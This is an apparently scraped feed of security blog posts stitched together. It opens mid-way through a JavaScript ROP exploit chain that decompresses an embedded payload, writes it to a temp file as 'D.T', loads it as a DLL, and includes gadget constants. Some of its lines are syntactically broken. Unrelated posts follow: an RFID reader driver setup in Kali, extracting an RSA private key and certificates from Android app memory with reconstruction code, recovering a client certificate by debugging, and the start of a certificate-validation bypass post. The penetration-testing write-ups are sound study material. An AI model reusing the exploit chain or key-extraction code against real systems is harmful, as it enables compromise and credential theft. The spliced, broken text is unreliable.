r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x81802d); //ptr to string (ntdll)
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0418);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // place holder for above
r+=getUnescape(moduleLoadAddr+0x818033); //prt to str "RtlDecompressBuffer"

r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {ntdll!RtlDecompressBuffer (77585001)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x41414141); // Place Holder for above - which is 2 (LZNT)
r+=getUnescape(0x44444444); // Place Holder for above - ptr to b64 blob
r+=getUnescape(0x1010101); // Place Holder for above - 01010101
r+=getUnescape(moduleLoadAddr+0x818066); //scratch_space + 66 - ptr to decoded blob
r+=getUnescape(0x43434343); // Place holder for above 00004a51
r+=getUnescape(moduleLoadAddr+0x818052); //scratch_space + 52 ptr to "756f7365"

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); //ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc047c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // handle
r+=getUnescape(moduleLoadAddr+0x81800e); //ptr to "fwrite"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05ec);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret;
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret


r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x60a4fc); //ptr to Kernel32.dll
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc04e0);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Handle
r+=getUnescape(moduleLoadAddr+0x818001] ptr to GetTempPathA
r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {kernel32!GetTempPathA (769e8996)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x1010101); //
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01; to be used to store the path

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01; path
r+=getUnescape(moduleLoadAddr+0x4f16f4); //add eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret ; is zero
r+=getUnescape(0x542e44); // is "D.T"
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret ;
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret ;
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05f8);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818052]
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05fc);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f165c); //65cf265c={MSVCR90!fopen (7188fe4a)}
r+=getUnescape(moduleLoadAddr+0x1dee7); //jmp [eax]
r+=getUnescape(moduleLoadAddr+0x5ec1a0); //pop ecx/pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01 ; Points to temppath+DLL name
r+=getUnescape(moduleLoadAddr+0x818015); //scratch_space + 15 ; points to "wb"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0600);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret;

r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0614);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ecx is ptr to 0

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 5e;
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05f4);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(0x42424242); // ptr to fwrite
r+=getUnescape(moduleLoadAddr+0x5012b3); //add esp,10h/ret
r+=getUnescape(0x43434343); // ptr to start of program
r+=getUnescape(0x44444444); // 1
r+=getUnescape(0x44444444); // 00008c00
r+=getUnescape(0x45454545); // file handle


r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1668); // ptr to fclose
r+=getUnescape(moduleLoadAddr+0x1dee7); // jmp dword ptr [eax]

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret - Useless?
r+=getUnescape(0x45454545);

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}

r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x818101); //Loads D.T as a library
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f10c0); // ptr to SleepStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret

r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x1010101);


r+=getUnescape(0x6f004d);
r+=getUnescape(0x750064);
r+=getUnescape(0x65006c);

ROP_ADD_ESP_4 = 0x20c709bb;
ROP_ADD_ESP_8 = 0x20d7c5ad;
ROP_ADD_ESP_10 = 0x20d022b3;
ROP_ADD_ESP_14 = 0x20cfa63f;
ROP_ADD_ESP_1C = 0x20cec3dd;
ROP_ADD_ESP_3C = 0x2080df51;
XCHG_EAX_ESP = 0x20d18753;
NOP = 0x20801017;
CLR_STACK = 0x20cea9bf;
STACK_PIVOT = 0x2089209e;




Using the OmniKey CardMan 5321/5325 in Kali Linux

$
0
0
By Brad Antoniewicz.

In a previous post on my old blog I detailed how to set up the OmniKey CardMan 5321 in Backtrack. It's surprising how often this topic comes up. Everyone wants to do RFID hax but HID makes life confusing because they haven't released a generic driver that can be incorporated into PCSC. So I finally had a chance to get my CardMan 5321 running in Kali and wanted to share the process via this quick blog post.

Driver Download

You'll need HID's Linux drivers to make this work. This may seem like a simple task, but the driver is not really obvious on the HID website. The CardMan 5321 product overview page has a link to the drivers download page, but rather then bringing you directly to the CardMan's drivers, it brings you to the page for every driver for ever HID reader. The first one is for Linux, which I think is where people get caught up.

The file I downloaded was ifdokrfid_lnx_i686-2.10.0.1.tar.gz. Here's a screenshot of the download location (you have to do some scrolling to find it):



I didn't try the 64-bit version, so use with caution.

Driver Install

Once you have the drivers found, everything is just about the same as my previous post. Decompress and install the drivers as detailed in the README:

root@kali:~# tar -zxf ifdokrfid_lnx_i686-2.10.0.1.tar.gz
root@kali:~# cd ifdokrfid_lnx_i686-2.10.0.1/
root@kali:~/ifdokrfid_lnx_i686-2.10.0.1# ./install

Installing HID Global OMNIKEY RFID Smartcard reader driver ...

PCSC-Lite found: /usr/sbin/pcscd
Copying ifdokrfid_lnx_i686-2.10.0.1.bundle to /usr/lib/pcsc/drivers ...

Installation finished!




Configuration

With the drivers installed, you just have to make sure that PCSC is set up to let the new drivers take over rather then its defaults. That can be accomplished with the script I wrote in the previous post. I put the script up on github for ease of access:



Then just download an run it:
root@kali:~# wget https://raw.github.com/OpenSecurityResearch/cardman_install_fix/master/cardman_install_fix.sh
root@kali:~# chmod +x cardman_install_fix.sh
root@kali:~# ./cardman_install_fix.sh
pcscd: no process found
PCSC-Lite found: /usr/sbin/pcscd
Found drop dir: /usr/lib/pcsc/drivers
Backing up Info.plist
Line Numbers:
ProductID: 330
0x5321: 482
VendorID: 105
FriendlyName: 555
Offsets:
General: 152
VendorID: 257
FriendlyName: 707
Deleting all the lines!
-i 482 d
-i




Previous Errors

In the previous post some people were getting this error when running the script:
/root/cardman_install_fix.sh: line 20: syntax error in conditional expression: unexpected token `&'
/root/cardman_install_fix.sh: line 20: syntax error near `&a'
/root/cardman_install_fix.sh: line 20: `if [[ -n $LINE_PRODID && -n $LINE_0x5321 && -n $LINE_VEND && -n $LINE_FRIEND ]]; then'



This is likely a copy and paste issue - you just need to change the & amp;& amp; to && on line 20. But that shouldn't happen anymore because its downloadable via GitHub.

Testing!

Now you should be able to get cardselect.py to recognize it once you start pcscd:

root@kali:~# pcscd
root@kali:~# cardselect.py -L
PCSC devices:
No: 0 OMNIKEY CardMan 5x21 00 00
No: 1 OMNIKEY CardMan 5x21 00 01



Enjoy!

Extracting RSAPrivateCrtKey and Certificates from an Android Process

$
0
0
By Gursev Singh Kalra.

An Android application that I assessed recently had extensive cryptographic controls to protect client-server communication and to secure its local storage. To top that, its source code was completely obfuscated. Combined, these two factors made the application a great candidate for reversing. In this blog I will detail the portion of work where I dumped X.509 certificates and constructed a RSA private key (RSAPrivateCrtKey) from the Android application memory using Eclipse Memory Analyzer Tool (MAT) and Java code.

Analyzing Android Memory with Eclipse MAT

Eclipse MAT is primarily a Java heap analyzer that has extensive usage beyond its primary purpose of identifying memory leaks. It can be used to identify and dump sensitive information in Android application memory, perform some memory forensics etc… If you are new to Android memory analysis, I recommend that you get intimate with this tool for its obvious benefits. The following articles can help you get started.



Okay, now back to our target application.

Locating the crypto material

As part of reversing process I used dex2jar to decompile the application apk to java files and started analyzing them. While following application logic and reviewing its obfuscated code, I stumbled upon a java file (com.pack.age.name.h.b.java) that contained instance variables of type SSLSocketFactory and X509TrustManager. Clearly, this class was performing important cryptographic operations with respect to client-server communication.

So I pivoted to this class to identify the source of its crypto material and all attempts led me from one rabbit hole to another. I then decided to directly look at application heap with Eclipse MAT. I launched the application and performed some operations to ensure that the application loads the required crypto material and then performed the following steps to create the HPROF file contain application heap dump.

  1. Select the application from the list of running apps
  2. Select the “Show heap updates” option for the target application
  3. Select “Dump HPROF file” for analysis.
  4. Since I had MAT plugin installed, ADT converted the Android memory dump to HPROF format and presented it for analysis. In case you do not have MAT plugin, you will need to convert the generated dump to MAT readable format with hprof-conv utility that comes with ADT.


After opening the heap dump, I clicked on the “Dominator Tree” to view the object graph. Supplying the name of the class which had SSLSocketFactory and X509TrustManager instance variables in the Regex area filtered out most of the unwanted stuff. I then navigated the object tree to identify the X.509 certificates and the RSAPrivateCrtKey is shown below.



Dumping the certificates

The X.509 certificates were byte arrays of different lengths and extracting the certificates turned out to be quick. I right clicked on the byte array -> navigated to Copy -> Save Value to File -> selected location to save the file and clicked Finish. MAT indicates that the copy functionality allows you to write char[], String, StringBuffer and StringBuilder to a text file but it handsomely handled the byte[] in the current context. Please note the extension of the exported file was set to .der on the windows system. The following screenshots will show you the steps followed and one extracted certificate.

First select the “Save Value to File” functionality for the byte[]:



Next save the file as certificate-1.der :



And now you can see the extracted Root CA certificate from the Android application:



Extracting the RSAPrivateCrtKey

The second important component was the RSAPrivateCrtKey and extracting it was a little more involved as we will see below. To summarize, the below provided steps were followed to retrieve the RSAPrivateKeyCrtKey:

  1. Locate components that make up the RSAPrivatecrtKeySpec
  2. Copy all the components and store them in file system
  3. Compute positive BigInteger values from these components
  4. Construct RSAPrivatecrtKeySpec from its components
  5. Use the RSAPrivatecrtKeySpec object to construct RSAPrivatecrtKey
  6. Write the RSAPrivatecrtKey to the file system in PKCS8 format
  7. And optionally:
    1. Convert PKCS8 to PEM using OpenSSL
    2. Extract public key from the PEM file with OpenSSL


Let us now look at the involved details.

The third component from the first image above corresponds to an instance of RSAPrivatecrtKeySpec which was the starting point to construct the key. Selecting the com.android.org.bouncycastle.jcajce.provider.asymmetric.rsa.BCRSAPrivateCrtKey entry in the MAT’s Dominator Tree populated the Attributes tab with the information (type, instance name and object reference) pertaining to the several participating BigInteger instances that are required to build this RSAPrivateCrtKeySpec. The following are the participating BigInteger components that make up a RSAPrivateCrtKeySpec:

  1. modulus
  2. publicExponent
  3. privateExponent
  4. primeP
  5. primeQ
  6. primeExponentP
  7. primeExponentQ
  8. crtCoefficient


I used this information to segregate the BigInteger component values to different variables as their values were copied out to the file system (see figure below). For example, the crtCoefficient at @0x410b0080 in the Attributes tab (left) was mapped to an array of 32 integers (right). The modulus at @0x410afde0 was 64 int’s long which indicated that the key size was 2048 bits. Since MAT does not know how to export BigInteger objects, I used the actual int[] reference inside the corresponding BigInteger dropdown to copy out the binary content.

That is, I right clicked on the int[] dropdowns under the BigInteger while exporting their content. This process was repeated for all the BigInteger components to 8 local files and the files were named as per the Attribute names.

Here's the Attributes pane and corresponding BigInteger objects in the heap



and the corresponding int[] content dump.



The next step after extracting the BigInteger components was to check if I am able to use them to re-construct the RSAPrivateCrtKeySpec. So I decided to perform two basic tests before going forward.

  1. Read individual int values from the file where int[]was dumped and match them against values in the MAT
  2. Check that all BigInteger components are positive numbers


I wrote some Java code to help me test all the binary dumps against these two conditions. The results indicated that first condition was true for all BigInteger components, but the second condition was not met by 3 out of 8 BigInteger components that had negative values as shown below.

Here's the matching integers from the binary dump against MAT (Condition 1)



Here are the negative values (Condition 1):

I searched around to identify the reason for the negative values and the comments in the OpenJDK code indicated that the negative values can be result of incorrect ASN.1 encoding. So I included the corresponding code to calculate and return 2’s complement for negative BigInteger values before supplying the values to RSAPrivateCrtKeySpec constructor.

The final Java code that reads the binary BigInteger (int[]) components from file system and creates RSAPrivateCrtKey in PKCS8 format is provided below.

import java.io.DataInputStream;
import java.io.EOFException;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.math.BigInteger;
import java.nio.ByteBuffer;
import java.nio.IntBuffer;
import java.security.KeyFactory;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.security.PrivateKey;
import java.security.Security;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.RSAPrivateCrtKeySpec;
import java.util.ArrayList;

import org.bouncycastle.jce.provider.BouncyCastleProvider;

public class Generate Key {

public static BigInteger bitIntFromByteArray(int[] byteArrayParam) {
byte[] localByteArray = new byte[byteArrayParam.length * 4];
ByteBuffer byteBuffer = ByteBuffer.wrap(localByteArray);
IntBuffer intBuffer = byteBuffer.asIntBuffer();
intBuffer.put(byteArrayParam);

BigInteger bigInteger = new BigInteger(localByteArray);
if(bigInteger.compareTo(BigInteger.ZERO) < 0)
bigInteger = new BigInteger(1, bigInteger.toByteArray());
return bigInteger;
}

public static BigInteger bigIntegerFromBinaryFile(String filename) throws IOException {
ArrayList<Integer> intArrayList = new ArrayList<Integer>();
DataInputStream inputStream = new DataInputStream(new FileInputStream(filename));
try {
while (true)
intArrayList.add(inputStream.readInt());
} catch (EOFException ex) {

} finally {
inputStream.close();
}

int[] intArray = new int[intArrayList.size()];
for(int i = 0; i < intArrayList.size(); i++)
intArray[i] = intArrayList.get(i);
return bitIntFromByteArray(intArray);

}

public static void main(String[] args) throws KeyStoreException, NoSuchProviderException, NoSuchAlgorithmException, InvalidKeySpecException, FileNotFoundException, IOException, ClassNotFoundException {
Security.addProvider(new BouncyCastleProvider());

BigInteger crtCoefficient = bigIntegerFromBinaryFile("h:\\key-coeffs\\crtCoefficient");
BigInteger modulus = bigIntegerFromBinaryFile("h:\\key-coeffs\\modulus");
BigInteger primeExponentP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentP");
BigInteger primeExponentQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentQ");
BigInteger primeP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeP");
BigInteger primeQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeQ");
BigInteger privateExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\privateExponent");
BigInteger publicExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\publicExponent");

System.out.println("crtCoefficient\t" + crtCoefficient);
System.out.println("modulus\t" + modulus);
System.out.println("primeExponentP\t" + primeExponentP);
System.out.println("primeExponentQ\t" + primeExponentQ);
System.out.println("primeP\t" + primeP);
System.out.println("primeQ\t" + primeQ);
System.out.println("privateExponent\t" + privateExponent);
System.out.println("publicExponent\t" + publicExponent);


RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(modulus, publicExponent, privateExponent, primeP, primeQ, primeExponentP, primeExponentQ, crtCoefficient);
KeyFactory factory = KeyFactory.getInstance("RSA", "BC");
PrivateKey privateKey = factory.generatePrivate(spec);
System.out.println(privateKey);
PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec(privateKey.getEncoded());
FileOutputStream fos = new FileOutputStream( "h:\\key-coeffs\\private-pkcs8.der");
fos.write(pkcs8EncodedKeySpec.getEncoded());
fos.close();
}
}




Converting PKCS8 to PEM

The next step of the process was to convert the private key from PKCS8 format to a PEM file and then to generate the public key from the private key with the following OpenSSL commands:

openssl pkcs8 –inform DER –nocrypt –in private-pkcs8.der –out privatePem.pem

openssl rsa –in privatePem.pem –pubout



Here is OpenSSL converting the PKCS8:



Finally we have the outputted RSA private key:



And we can use OpenSSL to extract the public key from the privatePem.pem file:



Conclusion

Memory analysis is a powerful technique that can be used to identify and extract sensitive information from application runtime. The extracted information can then be used to possibly defeat client side security controls.


Debugging Out a Client Certificate from an Android process

$
0
0
By Gursev Singh Kalra.

On most of my Mobile Hacking projects I setup my web proxy to intercept Android application’s traffic, test the proxy configuration, and traffic interception usually works like a charm. However from time to time, things aren't so straightforward. On a recent project connections to the applications’ server returned HTTP 403 error code because SSL mutual authentication was enforced and I did not have the client certificate.

I was in a situation where no meaningful communication could be established with the remote server. The resource files obtained by decompiling the application did not contain containing the client certificate and it was clear that it was stored in the obfuscated code somewhere.

I had already extracted a RSAPrivateCrtKey and two certificates from the application’s memory as discussed in my previous blog post. As it turned out, those were not sufficient and I still needed the client certificate and the corresponding password to be able to connect to the server and test the server side code. This blog post will detail how they were retrieved by debugging the application.

Identifying the Code Using the Client Certificate

The knowledge of how Java clients use SSL certificates to support client authentication proved critical during this assessment and helped me identify the function calls to look for during the debugging process. The typical steps followed to load a client certificate for a HttpsURLConnection are summarized below:

  1. Create instances of following classes:
    1. HttpsURLConnection - to communicate with the remote server
    2. KeyStore - to hold client certificate
    3. KeyManagerFactory - to hold KeyStore
    4. SSLContext - to hold KeyManager/li>
  2. Create File instance for the client certificate and wrap it inside an InputStream
  3. Invoke KeyStore instance’s load method with InputStream from step 2 and certificate password as char[] so it contains the client certificate
  4. Feed the KeyManagerFactory instance with KeyStore from step 3 and certificate password by invoking its init method
  5. Obtain KeyManager[] array from the KeyManagerFactory created above
  6. Invoke SSLContext intance’s init method and feed it the KeyManager[] from step 5
  7. Obtain a SSLSocketFactory from the created SSLContext and setup the HttpsURLConnection instance to use it for all SSL communication.
The following image depicts the steps discussed:



Instantiating a KeyStore and loading an InputStream for a client certificate are central to SSL client authentication support. So I searched the decompiled code for KeyStore class usage, corresponding instance variables and identified classes and methods that were potentially configuring the client side SSL certificate for HttpsURLConnection.

Identifying the Debug Points

I continued to eliminate KeyStore usages till I identified the class and method I was interested in. The identified class and method did not refer to any resource files to get the client certificate and its password but relied on couple of function calls to get the byte[] representation for client certificate and String representation for the password before feeding them to the load method of the KeyStore instance. Following the code paths led me to the two magic strings that I was looking for. They appeared to be Base64 encoded values of client certificate and the corresponding password.

Base64 decoding them returned gibberish which could not be put to any practical use as there was more to the encoded values than plain Base64 encoding. Further analysis revealed that they were subjected to standard crypto algorithms, and those algorithms were fed their Initialization Vectors and Encryption Keys from other Java classes. Additionally, the application also used some custom data manipulation tricks to further obfuscate them.

With limited time at hand I decided to briefly shelve the code analysis and move to application debugging to inspect the exact code points of interest for data extraction. To help with the debugging process, I noted down the class name, method name, and instance variable of interest where the potential client certificate and password were fed to the KeyStore instance.

Setting up the Application for Debugging

Reviewing AndroidManifest.xml of the decompiled application indicated that the application was not compiled with the debug flag and hence could not be debugged on a device. So I added the debug flag, recompiled it, signed the application and then installed it on the device. The following steps summarize the process of creating debuggable versions of existing Android applications if you plan to debug the application on an actual device.

  1. Decompile the application with apktool
  2. Add android:debuggable="true"attribute to the application element in the AndroidManifest.xml
  3. Recompile the application with apktool
  4. Sign the application with SignApk
  5. Install the application
The image below shows the debuggable attribute added to the AndroidManifest.xml file of the target application.



If you are using an emulator, you can extract the application from the device, install it on the emulator and attach a debugger without decompiling or adding the debuggable attribute to the AndroidManifest.xml file.

Let us now look at some of the important pieces of the debugging setup that was used.

Java Debug Wire Protocol

The Java Debug Wire Protocol (JDWP) is a protocol used for communication between a JDWP compliant debugger and the Java Virtual machine. The Dalvik Virtual Machine that is responsible for running the applications on Android devices supports JDWP as it debugging protocol. Each application that runs on a Dalvik VM exposes a unique port to which JDWP compliant debuggers can attach and debug the application.

Once the application was installed on the device in debug mode, the next step was to attach a JDWP compliant debugger, such as jdb, and get going.

jdb - The Java Debugger

jdb is a JDWP compatible command-line debugger that ships with Java JDK and I use jdb for its command line goodness. The typical process of attaching jdb to an Android application is summarized below:

  1. Launch the application that you want to debug
  2. Obtain its process ID
  3. Use adb to port forward JDWP connection to the application JDWP port
  4. Attach jdb to the application
  5. Set breakpoints and debug the application
The following resources can get you started on jdb debugging with Android.

Debugging for the Client Certificate

At this point, I knew the exact locations where breakpoints were needed to obtain client certificate and corresponding password. I setup the breakpoints in the functions that invoked the load method of a KeyStore instance to store the client certificate. So I launched the application and then browsed to the functionalities that would invoke the code paths leading to the breakpoints.

After hitting the breakpoint, I executed jdb dump to query the instance variable and invoked its different methods to retrieve the important information. The instances variable of interest was of class g. The Java class under analysis retrieved client certificate and its password by the following calls before feeding them to the load method:

  1. It called a method b()on its instance variable “g” to obtain the certificate password and converted it to char[]
  2. It called a method a() on its instance variable “g” to obtain byte[] representation of client certificate and wrapped it in a ByteArrayInputStream
The following screenshot shows the rundown leading up to the client certificate and the password.



After obtaining the byte[] dump of the client certificate, I created the pfx file with following Java code and then imported it to my browser store and also inside the web proxy.

import java.io.FileOutputStream;
import java.io.IOException;

public class PfxCreatorFromByteArray {
public static void main(String... args) throws IOException {
// Contains the byte[]for client certificate
byte[] pfx = {48, -126, };
FileOutputStream fos = new FileOutputStream("client-cert.pfx");
fos.write(pfx);
fos.close();
}
}




The following image shows successful client certificate import.



The imported client certificate then allowed me to successfully engage and assess the server portion of the application. In addition to the client certificate, combining the static and dynamic analysis techniques also allowed me to retrieve other sensitive information like Initialization Vectors, Encryption Keys etc… from the application.

Patching an Android Application to Bypass Custom Certificate Validation

$
0
0
By Gursev Kalra.

One of the important tasks while performing mobile application security assessments is to be able to intercept the traffic (Man in The Middle, MiTM) between the mobile application and the server by a web proxy like Fiddler, Burp etc… This allows penetration tester to observe application behavior, modify the traffic and overcome the input restrictions enforced by application’s user interface to perform a holistic penetration test.

Mobile applications exchanging sensitive data typically use the HTTPS protocol for data exchange as it allows them to perform server authentication to ensure a secure communication channel. The client authenticates the server by verifying server’s certificate against its trusted root certificate authority (CA) store and also checks the certificate’s common name against the domain name of the server presenting the certificate. To proxy (MiTM) the HTTPS traffic for mobile application, web proxy’s certificate is imported to the trusted root CA store otherwise the application may not function due to certificate errors.

For most mobile application assessments you can just setup a web proxy to intercept mobile application’s SSL traffic by importing its certificate to device’s trusted root CA store. To ensure that the imported CA certificate works fine, its common to use the Android’s browser to visit a couple of SSL based websites and you should see that the browser accepts the MiTM’ed traffic without complaint. Typically, the native Android applications also uses the common trusted root CA store to validate server certificates, so no extra work is required to intercept their traffic. However, for some applications that could differ - let's take a look at how to handle those apps.

Analyzing the Unsuccessful MiTM

When you launch the application under test and attempt to pass its traffic through the web proxy, the application will likely display an error screen indicating that it could not connect to the remote server because of no internet connection or it could not establish a connection for unknown reasons. If you're confident in your setup, the next step is to analyze the system logs and SSL cipher suite support.

logcat

logcat is Android’s logging mechanism that is used to view application debug messages and logs. First run "adb logcat" to check if the application under test creates any stack trace indicating the cause of the error but there was none. The application may also leave debug logs indicating that the developers did a good job with the error handling or write debug messages that could potentially expose application internal working to prying eyes.

Common SSL Cipher suites

When a web proxy acts as a MiTM between client and the server, it establishes two SSL communication channels. One channel is with the client to receive requests and return responses, the second channel is to forward application requests to the server and receive server responses. To establish these channels, the web proxy has to agree on common SSL cipher suits with both the client and the server and these cipher suites may not be the same as shown in the image below.



You may see SSL proxying errors occur in one or both of the following scenarios which lead to failures while establishing a communication channel.

  1. Android application and the web proxy do not share any common SSL cipher suite.
  2. The web proxy and the server do not share any common SSL cipher suite.
